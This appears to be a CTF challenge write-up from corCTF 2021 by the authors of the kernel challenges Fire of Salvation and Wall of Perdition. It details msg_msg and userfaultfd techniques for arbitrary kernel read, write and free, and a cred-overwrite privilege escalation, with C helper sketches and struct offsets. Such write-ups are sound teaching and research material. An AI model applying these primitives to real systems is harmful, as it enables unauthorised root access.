In corCTF 2021, D3v17 and I wrote two kernel challenges, Fire of Salvation and Wall of Perdition, built around a technique that is novel (at least to our knowledge) for gaining arb read and arb write in kernel land. A famous kernel object often abused for heap sprays is the msg_msg struct, an elastic kernel object meant for IPC (System V message queues) whose allocations range from kmalloc-64 to kmalloc-4k. There was also a recent CVE exploit writeup by Linux kernel developer and security researcher Alexander Popov, in which he abused msg_msg for arb read in his exploit for CVE-2021-26708. D3v17 and I read this and asked ourselves: is it possible to achieve arbitrary write with msg_msg across any slab it can validly live in? After a week or two of digging around, not only did we discover a way to achieve arb write on kmalloc-4k slabs, but we also discovered a way to do this for any valid msg_msg slab. In this post, I'll detail the Fire of Salvation writeup, which covers arb write on kmalloc-4k slabs. I'll also provide a tldr with the insights for arb write on any valid msg_msg slab, along with a summary of my approach for the second challenge, but D3v17 will go into detail in his post for Wall of Perdition. Since this writeup is quite long, feel free to let me know of any unclear explanations or mistakes.
In this challenge, the following key protections were enabled on a 5.8 kernel: FG-KASLR, SLAB_RANDOM, SLAB_HARDENED, and STATIC_USERMODE_HELPER. The SLAB allocator was also being used, and a corresponding kernel.config file was provided with all the other tidbits and miscellaneous options (such as the userfaultfd syscall being enabled, hardened_usercopy, CHECKPOINT_RESTORE, etc.). SMAP, SMEP, and KPTI being on was a given. Also, since our goal was to introduce players to a novel exploitation technique, we didn't really care much about the reversing procedure to find a bug, and didn't want to overcomplicate the bug. In our discussions, we decided to just make the bug a pretty obvious UAF that limits players to around 0x28 to 0x30 bytes of UAF write (no UAF read). This was the source we provided to all the players (we were also nice enough to give out a vmlinux with debug symbols and structs):
To summarize, a simple firewall driver was created, with separate arrays for inbound rules and outbound rules (confined to IPv4). From userland, people can interact with the netfilter hooks via a misc device, using the user_rule_t struct, which gets transferred into the rule_t struct that lives in the kmalloc-4k slab. Each rule is allocated in the array via kzalloc, and contains information about rule name, interface name, IP address, port, the action to take, the protocol (TCP or UDP), a duplication flag, and a large buffer for a description which one cannot modify after allocating it. Most of these fields have validity checks (actions are limited to DROP or ACCEPT), and add, edit, and delete rule are all safe. The only bug is in duplicate, which duplicates a rule from inbound to outbound or vice versa; an obvious UAF scenario occurs when you duplicate a rule from array 1 to array 2, and then delete it from one array without deleting it from the other.
Exploitation wise, there are a few serious roadblocks that prevent common exploit paths and necessitate good arb read and arb write primitives. The fact that it is using the SLAB allocator means that no freelist pointer will be on the chunks themselves (and even if there were, it probably wouldn't be within the 0x30 UAF region, as the Linux kernel has moved it down for certain slabs). FG-KASLR will complicate the ability to overwrite function pointers (such as the one on the sk_buff struct's destructor arg callback in the CVE writeup), as most gadgets not in the earlier parts of .text will be affected; ROP is still possible, but I believe that would entail first arb reading the ksymtab entry for whichever function the gadget is relative to. Lastly, with STATIC_USERMODE_HELPER (and its path set to ""), the classic SMAP bypasses of targeting modprobe_path or core_pattern no longer work. The path itself is now located in a read only section of the kernel according to readelf. At this point, the most direct way to bypass SMAP is probably to arb read the doubly linked list of task structures to find the current task, and overwrite its cred pointer with one that would give us root privileges. A physmap spray would be another common approach, but that's just painful.
Do note again that the vulnerability only gives a small window of UAF write, without UAF read. Once we allocate a few chunks to help smooth out the SLAB shuffling on the current slab, we can begin the exploitation procedure. Let's first take a detour into msg_msg (these manpages can be quite helpful). I do consistently use the IPC_NOWAIT option to avoid hangs and a msgtyp of zero to pull from the front of the msg_queue. For reference, here is the msg_msg struct:
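As a rough userland mirror of that layout (a sketch assuming x86_64; the `_mirror` type names are mine, while the field names follow the kernel's definition), the offsets can be checked at compile time:

```c
#include <assert.h>
#include <stddef.h>

/* Userland stand-in for the kernel's struct list_head (two pointers). */
struct list_head_mirror {
    struct list_head_mirror *next, *prev;
};

struct msg_msgseg_mirror;             /* segment: a next pointer, then data */

/* Mirror of struct msg_msg; offsets assume an LP64 target such as x86_64. */
struct msg_msg_mirror {
    struct list_head_mirror m_list;   /* 0x00: links the message into its queue */
    long m_type;                      /* 0x10: message type */
    size_t m_ts;                      /* 0x18: message text size */
    struct msg_msgseg_mirror *next;   /* 0x20: first extra segment, or NULL */
    void *security;                   /* 0x28: LSM blob pointer */
    /* the message data follows immediately after the header */
};

static_assert(sizeof(struct msg_msg_mirror) == 0x30, "assumes LP64 (x86_64)");
```

With the header being 0x30 bytes, a UAF write of roughly 0x28 to 0x30 bytes over the start of the chunk reaches both m_ts and next, which are the two fields the rest of this post cares about.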
In our case, the security pointer will always be null, since there is no SELinux.
Looking at do_msgsnd, before enqueuing this msg onto the specified message queue, load_msg is called to usercopy data into the chunk.
Note how it calls alloc_msg to allocate space on the kernel heap for the incoming message beforehand.
msg_msgseg is simply a struct that has a next pointer with data following immediately afterwards. Both DATALEN_MSG and DATALEN_SEG are basically page size minus the size of their respective structs, so their maximum size fits exactly in the kmalloc 4k slabs. Once you send in larger messages, a linked list is created. The maximum size of a message is determined by /proc/sys/kernel/msgmax, and its default is 8192 bytes (so you can get a linked list of 3 elements at most).
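To make the sizing arithmetic concrete, here is a small sketch (assuming 4096-byte pages, a 0x30-byte msg_msg header, and an 8-byte msg_msgseg header; the helper names are mine) that computes how many allocations a message of a given length needs and how large the last one is:

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE_ASSUMED 4096u
#define MSG_HDR 0x30u                               /* sizeof(struct msg_msg) on x86_64 */
#define SEG_HDR 0x8u                                /* sizeof(struct msg_msgseg) */
#define DATALEN_MSG (PAGE_SIZE_ASSUMED - MSG_HDR)   /* 4048 data bytes in the head */
#define DATALEN_SEG (PAGE_SIZE_ASSUMED - SEG_HDR)   /* 4088 data bytes per segment */

static_assert(DATALEN_MSG == 4048 && DATALEN_SEG == 4088, "sizes quoted in the text");

/* Number of heap allocations (head plus segments) for a message of len bytes. */
static size_t msg_chunk_count(size_t len)
{
    size_t chunks = 1;
    size_t rest = len > DATALEN_MSG ? len - DATALEN_MSG : 0;

    while (rest > 0) {
        size_t alen = rest < DATALEN_SEG ? rest : DATALEN_SEG;
        rest -= alen;
        chunks++;
    }
    return chunks;
}

/* Requested allocation size (header included) of the last chunk in the chain. */
static size_t msg_last_chunk_size(size_t len)
{
    if (len <= DATALEN_MSG)
        return MSG_HDR + len;

    size_t tail = (len - DATALEN_MSG) % DATALEN_SEG;
    if (tail == 0)
        tail = DATALEN_SEG;
    return SEG_HDR + tail;
}
```

For the default msgmax of 8192 this gives three allocations, the last one being a 64-byte request, and a message of DATALEN_MSG + 24 bytes produces a 4k head chained to a 32-byte segment.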
Now, let's take a look at do_msgrcv
If the MSG_COPY flag is set (which is available with CONFIG_CHECKPOINT_RESTORE), it calls prepare_copy, which is just a wrapper around load_msg to prepare a copy (interestingly enough, doesn't using that make it also usercopy whatever is in the userland buffer for receiving into the allocated copy first?). Without that flag, it simply traverses the queue, finds the msg with find_msg, and unlinks it. With the flag set, no unlink happens; instead, copy_msg is called, and data is transferred to the copy via a memcpy (note the memcpy, this is very important!).
If no errors have happened yet, it reaches the msg_handler call, which is actually do_msg_fill if you trace the code path from the call to do_msgrcv. do_msg_fill is basically a wrapper around store_msg, which does the following:
Basically, it traverses the linked list structure of the msg_msg object, and uses usercopy to bring the desired message back to userspace. Then, do_msgrcv calls free_msg, which frees the linked list structure in order (starting from the head, then next, etc.).
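From userland, the non-destructive receive path can be exercised with a thin wrapper like the sketch below. `peek_msg` and `peek_flags` are hypothetical helper names of mine, not something from the challenge or the exploit; the flag values come from the standard System V headers. Note that with MSG_COPY the msgtyp argument is interpreted as the index of the message in the queue, and that MSG_COPY has to be combined with IPC_NOWAIT.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE                 /* glibc only exposes MSG_COPY with this */
#endif
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#ifndef MSG_COPY
#define MSG_COPY 040000             /* value from the kernel's uapi header */
#endif

/* Flags for a receive that copies a message out without dequeuing it. */
static int peek_flags(void)
{
    return IPC_NOWAIT | MSG_COPY;
}

/*
 * Copy the idx-th message of queue qid into msgbuf (a long mtype followed
 * by at least text_len bytes) while leaving it on the queue.
 * Returns the number of text bytes copied, or -1 with errno set.
 */
static ssize_t peek_msg(int qid, void *msgbuf, size_t text_len, long idx)
{
    assert(msgbuf != NULL);
    return msgrcv(qid, msgbuf, text_len, idx, peek_flags());
}
```

On a kernel built without CONFIG_CHECKPOINT_RESTORE, such a call is expected to fail rather than fall back to a normal receive.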
Now, let us think about abusing a UAF over these elastic objects for arb read and arb write. By modifying the next pointer or the size, arb read via msg_msg should be quite trivial, except that a normal msgrcv unlinks the message from the queue, and with the first few qwords clobbered (which you can't avoid in this challenge) that unlink would wreck things. You can try to modify the size so that it leaks more data from the next segment of the msg_msg object, but hardened usercopy would stop you dead in your tracks. However, this is where MSG_COPY comes into play. Not only does it not unlink your message, but it also uses memcpy for the initial copying of data! So now, we can happily modify the next pointer and change the m_ts field. This technique has already been documented in Popov's CVE writeup. The only restriction is that your next segment has to start with a null qword, since that qword is treated as the segment's own next pointer; otherwise the traversal keeps going, which leads to a kernel panic or a walk to somewhere you do not want it to go.
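The effect of corrupting m_ts and next can be simulated entirely in userland. The sketch below is a toy model, not kernel code: `model_msg` keeps only the two fields that matter, `model_store` mimics the head-then-segments traversal described above, and `model_arb_read` plays the role of the UAF write followed by an MSG_COPY receive. All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MODEL_PAGE 4096
#define MODEL_MSG_HDR 0x30
#define MODEL_SEG_HDR 0x8
#define MODEL_DATALEN_MSG (MODEL_PAGE - MODEL_MSG_HDR)
#define MODEL_DATALEN_SEG (MODEL_PAGE - MODEL_SEG_HDR)

/* Simplified head chunk: only the fields the UAF needs to corrupt. */
struct model_msg {
    size_t m_ts;                 /* claimed message size */
    const unsigned char *next;   /* address of the next segment, or NULL */
    unsigned char data[MODEL_DATALEN_MSG];
};

/* Copy out the head data, then follow next pointers until one is NULL. */
static void model_store(unsigned char *dest, const struct model_msg *msg, size_t len)
{
    size_t alen = len < MODEL_DATALEN_MSG ? len : MODEL_DATALEN_MSG;
    const unsigned char *seg = msg->next;

    memcpy(dest, msg->data, alen);
    while (seg != NULL) {
        const unsigned char *following;

        len -= alen;
        dest += alen;
        alen = len < MODEL_DATALEN_SEG ? len : MODEL_DATALEN_SEG;
        memcpy(dest, seg + MODEL_SEG_HDR, alen);       /* data sits after the header */
        memcpy(&following, seg, sizeof following);     /* first qword is seg->next */
        seg = following;
    }
}

/*
 * Simulated primitive: read n bytes at target, which must be preceded by a
 * null qword so that the fake segment's next pointer ends the traversal.
 */
static void model_arb_read(const void *target, void *out, size_t n)
{
    static struct model_msg victim;
    static unsigned char user_buf[MODEL_DATALEN_MSG + MODEL_DATALEN_SEG];

    assert(n <= MODEL_DATALEN_SEG);
    victim.m_ts = MODEL_DATALEN_MSG + n;                          /* enlarged size */
    victim.next = (const unsigned char *)target - MODEL_SEG_HDR;  /* forged pointer */
    model_store(user_buf, &victim, victim.m_ts);
    memcpy(out, user_buf + MODEL_DATALEN_MSG, n);                 /* leak follows head data */
}
```

In the model, as in the real primitive, the leaked bytes show up in the receive buffer right after the first DATALEN_MSG bytes of head data.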
How would we approach arb write then? This is where every Linux kernel exploit developer's good friend userfaultfd comes back (rip, given the new unprivileged userfaultfd settings from 5.11 onwards). During the msgsnd process, if you have a UAF over the first part of the msg_msg object, you can send a message that requires more than one allocation. Then, if you abuse userfaultfd to hang the copy right before the kernel pulls the value of the next pointer (such as when it's a few bytes away from copying everything into the first chunk), you can use the UAF to change this next pointer, and you achieve arbitrary write once you release the hang! Of course, just like arb read, this requires the target region to start with a null qword. To make this clearer, take a look at the following diagram:
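As a complement to the diagram, the userland half of the hang might be set up roughly as follows. This is a sketch under assumptions rather than the code from my exploit: `place_msgbuf` and `register_uffd` are hypothetical helpers, the page size is assumed to be 4096, and the fault-handling thread (which would perform the UAF write to next and then resolve the fault with UFFDIO_COPY) is left out.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

#define PAGE_SZ 4096u
#define FIRST_CHUNK_DATA (PAGE_SZ - 0x30u)   /* DATALEN_MSG on x86_64 */

/*
 * Address at which to place the msgsnd buffer so that `before` bytes of
 * mtext sit in ordinary memory and everything after them sits in the page
 * registered with userfaultfd. The fault has to hit while the head chunk
 * is still being filled, hence before < FIRST_CHUNK_DATA.
 */
static uintptr_t place_msgbuf(uintptr_t fault_page, size_t before)
{
    assert(before < FIRST_CHUNK_DATA);
    return fault_page - before - sizeof(long);   /* long mtype precedes mtext */
}

/* Register [addr, addr + len) for missing-page faults; returns the uffd or -1. */
static int register_uffd(void *addr, size_t len)
{
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    struct uffdio_register reg = {
        .range = { .start = (uintptr_t)addr, .len = len },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd < 0)
        return -1;
    if (ioctl(uffd, UFFDIO_API, &api) < 0 ||
        ioctl(uffd, UFFDIO_REGISTER, &reg) < 0) {
        close(uffd);
        return -1;
    }
    return uffd;
}
```

With this layout, the bytes of mtext past the first FIRST_CHUNK_DATA are the ones that end up 8 bytes past wherever the forged next pointer points, so the payload for the target belongs there.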
Now with an understanding of both primitives, what will the exploitation path be from where we left off? Well, as I discussed in my hashbrown writeup from diceCTF, to get a kernel base leak with FG-KASLR on, we need to rely on pointers into kernel data, as those are not affected. It's as simple as spraying a ton of shm_file_data objects in kmalloc-32 (which hold pointers to kernel data, such as in the init_ipc_ns field), and allocating a msg_msg whose head takes up the 4k chunk under our UAF's control and whose next segment lands in a kmalloc-32 slab. Then we can expand the size (without causing it to traverse more than once), and use MSG_COPY to get an OOB read in the kmalloc-32 slabs and achieve leaks. Of course, before we do that, we have to make sure our data sent via the ioctl follows the expected format (ip, netmask, etc.), but that is trivial to implement.
Then, we can re-abuse this arb read to read the task_struct linked list starting from init_task. Since our exploit is probably the latest process running on a generally idle qemu system, we can just walk backwards via prev and hit our task_struct pretty quickly. While a normal trick to find offsets in task_struct is to use prctl SET_NAME to set the comm member (as ptr-yudai detailed in his Google CTF Quals 2021 Fullchain writeup), we provided vmlinux with debugging symbols and structs. The task doubly linked list is located at an offset of 0x298, with a consistently null qword beforehand; the pid is at offset 0x398 (which is close enough for this region to be treated as a single msg segment); and the real_cred and cred pointers are at offsets 0x538 and 0x540, also luckily with a nice null qword beforehand.
Once we find the current process based on the pid in the task structs, we can just arb write to its real_cred and cred pointers, replacing them with init_cred and effectively pwning the system.
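The walk itself is simple once an arb read exists. Here is a hedged sketch of the logic using the offsets quoted above; the `arb_read_fn` callback is a hypothetical stand-in for the MSG_COPY primitive, and `fake_mem`, `fake_read`, and `fake_task` only exist so the walk can be tried against fabricated memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets quoted above for this challenge's 5.8 build. */
#define TASKS_OFF     0x298   /* task_struct.tasks (list_head: next, prev) */
#define PID_OFF       0x398
#define REAL_CRED_OFF 0x538   /* arb write target, along with CRED_OFF */
#define CRED_OFF      0x540

/* Hypothetical arb read callback: returns 0 on success. */
typedef int (*arb_read_fn)(void *ctx, uint64_t addr, void *out, size_t len);

/* Walk tasks.prev from init_task until pid matches; returns the task or 0. */
static uint64_t find_task(arb_read_fn rd, void *ctx, uint64_t init_task,
                          int32_t pid, unsigned max_steps)
{
    uint64_t task = init_task;

    assert(rd != NULL);
    for (unsigned i = 0; i < max_steps; i++) {
        uint64_t prev;
        int32_t cur;

        if (rd(ctx, task + TASKS_OFF + 8, &prev, sizeof prev))
            return 0;
        task = prev - TASKS_OFF;          /* list node back to containing task */
        if (task == init_task)
            return 0;                     /* wrapped around without a match */
        if (rd(ctx, task + PID_OFF, &cur, sizeof cur))
            return 0;
        if (cur == pid)
            return task;
    }
    return 0;
}

/* Fabricated "kernel memory" used only to exercise the walk. */
struct fake_mem {
    uint64_t base;
    unsigned char bytes[0x2000];
};

static int fake_read(void *ctx, uint64_t addr, void *out, size_t len)
{
    struct fake_mem *m = ctx;

    if (addr < m->base || addr - m->base + len > sizeof m->bytes)
        return -1;
    memcpy(out, m->bytes + (addr - m->base), len);
    return 0;
}

/* Write a fake task's tasks.prev and pid into the fabricated memory. */
static void fake_task(struct fake_mem *m, uint64_t task, uint64_t prev_task, int32_t pid)
{
    uint64_t prev = prev_task + TASKS_OFF;

    memcpy(m->bytes + (task - m->base) + TASKS_OFF + 8, &prev, sizeof prev);
    memcpy(m->bytes + (task - m->base) + PID_OFF, &pid, sizeof pid);
}
```

In the actual exploit, one MSG_COPY read anchored on the null qword before the tasks list can return both the list pointers and the pid, so the two callback reads per task here collapse into a single receive. The address returned plus REAL_CRED_OFF and CRED_OFF is where the arb write then goes.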
Here is my exploit for reference:
With this exploit, you can reliably pop a root shell and read the flag:
For some reason, musl wasn't working well with threads on the qemu, so I had to use gcc static. Luckily, upx packer managed to cut the size down by more than 60%, though that is still much larger than a musl compiled exploit. Congratulations to Maher for taking the unofficial post-CTF first blood on this challenge. A shout-out goes to team SuperGuesser as well; I heard they were quite close to solving it during the CTF.
As for the Wall of Perdition challenge, I will only provide a brief summary of my solution, which I believe might slightly differ from D3v17's. His post on this part will be much more detailed, with many more diagrams to come.
In this second part, the sizes are limited to kmalloc-64; I wasn't aware of any commonly known abusable structures in this range. While arb read is still quite trivial thanks to MSG_COPY, using it to get a kernel base leak with FG-KASLR is not as easy. Arb write becomes even harder as well.
To get the same shm_file_data kernel leak, I first allocated two message queues, and I would like to find the address of one of them (I will call this one the front queue). Finding its address is easy, as we can just spray msg_msg structs in the same queue (beware that there is a limit set by /proc/sys/kernel/msgmnb that defaults to 16384 bytes total per queue), and abuse OOB read via MSG_COPY to check for known msg_msg contents from the spray.
This leak will be useful for avoiding crashes and for prematurely stopping the traversal of the msg_msg queue linked list during do_msgrcv when MSG_COPY isn't set. Then I sprayed more msg_queue allocations, and sent in a message for each, as I am looking for a message and queue I can reach with the OOB read from the front queue in the kmalloc-64 slabs. From here, I can send a msg_msg object that chains a 4k chunk with a kmalloc-32 chunk into this target queue, and leak its address by OOB reading the linked list pointers of the kmalloc-64 msg_msg object queued before it.
At this point, we have to pray that the qword before that 4k chunk is null. If so, pointing the next pointer of the UAF'd chunk in the front queue at that location will allow us to get the address of the kmalloc-32 chunk. After spraying many more shm_file_data objects, we can just expand the msg_msg struct under our UAF's control to a much larger size, point this very object's next pointer at the kmalloc-32 chunk, and dump huge portions of kmalloc-32 with MSG_COPY for a kernel base leak. From here on out, arb reading the task structs to find the current task is pretty much the same as in the previous exploit.
Now, for arb write, I reused the target queue from earlier, cleared the large msg out from it, and replaced it with a msg_msg object that has two 4k chunks in its chain (this is getting quite close to the default msg_msg size limit). I can abuse the previous technique to then leak the address of this new 4k msg_msg object along with the address of its msg segment. Then, I freed this large object with msgrcv (and we will get the chunks back in the order of the leaked segment address and then the leaked msg_msg object due to LIFO). I then msgsnd a message sized to require two 4k chunks, hang it with userfaultfd in load_msg, and quickly arb free its segment via msgrcv on the msg_msg under UAF control in the front queue. No crashes will occur since I fixed its pointers to go right back to the front queue itself.
With this arb free primitive, I send another message in another message queue that was previously allocated; it will also be hung when reading in userland data. The object will be just large enough to cover a 4k chunk (to get back the last freed chunk due to LIFO) chained with a small segment. I then let the data transfer from the original hang continue, which gives me the ability to overwrite the next pointer of the currently allocated msg_msg object, thereby giving me arb write once I let this second hang continue and finish off. This might seem quite insane, but I promise you that D3v17's blogpost will make this quite clear with his diagrams.
Here is my final exploit, which only had about a 50% success rate.
Running this remotely should eventually give us root privs and the flag:
Congratulations to jass93 of RPISEC for taking the unofficial post-CTF first blood on this challenge. The player didn't exactly go down the intended route of abusing an arb free primitive, but rather abused the unlinking mechanism in msgrcv, which seems quite powerful too. Overall, D3v17 and I learned a lot from developing these challenges, and believe that these primitives will be quite applicable on most kernel versions given a somewhat sizeable UAF. The change in default unprivileged userfaultfd permissions definitely weakens these primitives, and the potential idea of a SLAB quarantine mechanism would render this technique pretty much useless for non-4k slab sizes due to its reliance on LIFO behavior. Another really interesting kernel hardening measure we accidentally stumbled upon was usercopy whitelisting, in which slab regions have whitelists on what usercopy can interact with. Luckily, fallback is enabled by default, including on most Linux distros, but if it were disabled, our SMAP bypass methodology would have failed. Thankfully modprobe_path and core_pattern still exist, but we wonder what other SMAP bypass techniques would be just as simple and elegant. Hopefully you learned a lot from this writeup, and make sure to read D3v17's in-depth and amazing writeup for Wall of Perdition.